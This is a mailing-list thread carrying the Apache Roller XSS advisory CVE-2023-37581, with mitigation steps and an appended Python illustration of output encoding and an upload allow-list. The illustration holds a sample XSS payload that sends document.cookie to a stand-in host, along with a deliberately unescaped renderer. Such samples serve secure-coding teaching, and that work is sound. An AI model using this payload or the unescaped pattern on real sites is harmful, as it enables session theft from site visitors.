
List:       oss-security
Subject:    [oss-security] Re: CVE-2023-37581: Apache Roller: XSS vulnerability for site with untrusted users
From:       Srivani Reddy <srivani.reddy@securelayer7.net>
Date:       2023-08-16 3:45:35
Message-ID: <MAXPR01MB350100A5BBBD4B0E8AE07E79D015A@MAXPR01MB3501.INDPRD01.PROD.OUTLOOK.COM>


Hi Dave,

Can you please change the name Srivani Reddy to our company SecureLayer7 Technologies Pvt Ltd as we submitted the vulnerability?

Regards,
Srivani


________________________________
From: Dave <snoopdave@gmail.com>
Sent: Sunday, August 6, 2023 1:42:26 AM
To: Apache Security Team <security@apache.org>; oss-security@lists.openwall.com <oss-security@lists.openwall.com>; Srivani Reddy <srivani.reddy@securelayer7.net>; dev@roller.apache.org <dev@roller.apache.org>; Roller User <user@roller.apache.org>
Subject: CVE-2023-37581: Apache Roller: XSS vulnerability for site with untrusted users


The Apache Roller project would like to announce a vulnerability that may impact Roller installations that allow group blogging with untrusted users.

Severity:

Medium (only impacts group blogging sites with untrusted users)

Description:

Insufficient input validation and sanitation in Weblog Category name, Website About and File Upload features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack.

Mitigation:

If you are not running a group blog, then no mitigation is needed. If you are running a group blog and you do not have Roller configured for untrusted users, then you need to do nothing because you trust your users to author raw HTML and other web content.

But, if you are running a group blog and you do not trust your users to author HTML, CSS and JavaScript then you should upgrade to Roller 6.1.2 and you should disable Roller's File Upload feature. Roller 6.1.2 is available for download here: https://roller.apache.org/downloads/downloads.html

Apache Roller would like to thank Srivani Reddy for reporting this vulnerability.


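The advisory above names stored-field and file-upload entry points for the XSS. The block below is an added illustration written for this page, not Roller's code and not the reporter's proof of concept: a hypothetical category-name renderer shown first without and then with output encoding, plus a hypothetical image-upload check that refuses file types a browser would execute script from if served under the site's origin. The function names, the image-only upload policy, the domain in the payload and the sample inputs are all assumptions constructed for the example.

```python
"""
Illustration (not Apache Roller code) of the two XSS paths the advisory names:
a stored field (here a weblog category name) rendered into HTML without output
encoding, and a file upload that lets an untrusted author publish active
content under the site's origin. All names and policies here are hypothetical.
"""
import html
import os
import re

# --- Path 1: a stored field value rendered into a page --------------------

# Constructed sample of what an untrusted author might save as a category name.
HOSTILE_CATEGORY = '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">'


def render_category_vulnerable(name: str) -> str:
    """Interpolate the stored name straight into markup (the flawed pattern)."""
    return f'<li class="category">{name}</li>'


def render_category_fixed(name: str) -> str:
    """Context-aware output encoding: the name becomes text, never markup."""
    return f'<li class="category">{html.escape(name, quote=True)}</li>'


TAG_RE = re.compile(r"<[a-zA-Z/!][^>]*>")


def contains_markup(rendered: str, wrapper_tag: str = "li") -> bool:
    """True if any tag other than the template's own wrapper survived into the output."""
    tags = TAG_RE.findall(rendered)
    return any(not re.match(rf"</?{wrapper_tag}\b", t) for t in tags)


# --- Path 2: a file upload that serves browser-active content -------------

# Types a browser will run script from when served inline from the blog's origin.
ACTIVE_EXTENSIONS = {".html", ".htm", ".xhtml", ".svg", ".js", ".xml", ".shtml"}
# Assumed policy for the example: only raster images may be uploaded.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# File signatures of the allowed types, checked against the actual bytes.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def upload_allowed(filename: str, content: bytes) -> bool:
    """Allow-list by extension, then confirm the bytes match the claimed type."""
    # splitext keeps only the last suffix, so "pic.png.html" is judged as .html.
    ext = os.path.splitext(filename.lower())[1]
    if ext in ACTIVE_EXTENSIONS or ext not in ALLOWED_EXTENSIONS:
        return False
    if not content.startswith(MAGIC[ext]):
        return False  # extension claims an image, the bytes say otherwise
    # Defence in depth: refuse bodies that still carry markup a sniffing
    # browser might render, even behind a valid image header.
    lowered = content.lower()
    return b"<script" not in lowered and b"<svg" not in lowered
```

The upload check is the server-side complement to the advisory's "disable File Upload" mitigation: if uploads must stay enabled, an allow-list plus content verification (and serving uploads with a nosniff header from a separate origin) removes the ability to publish HTML or SVG that executes in the blog's context.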

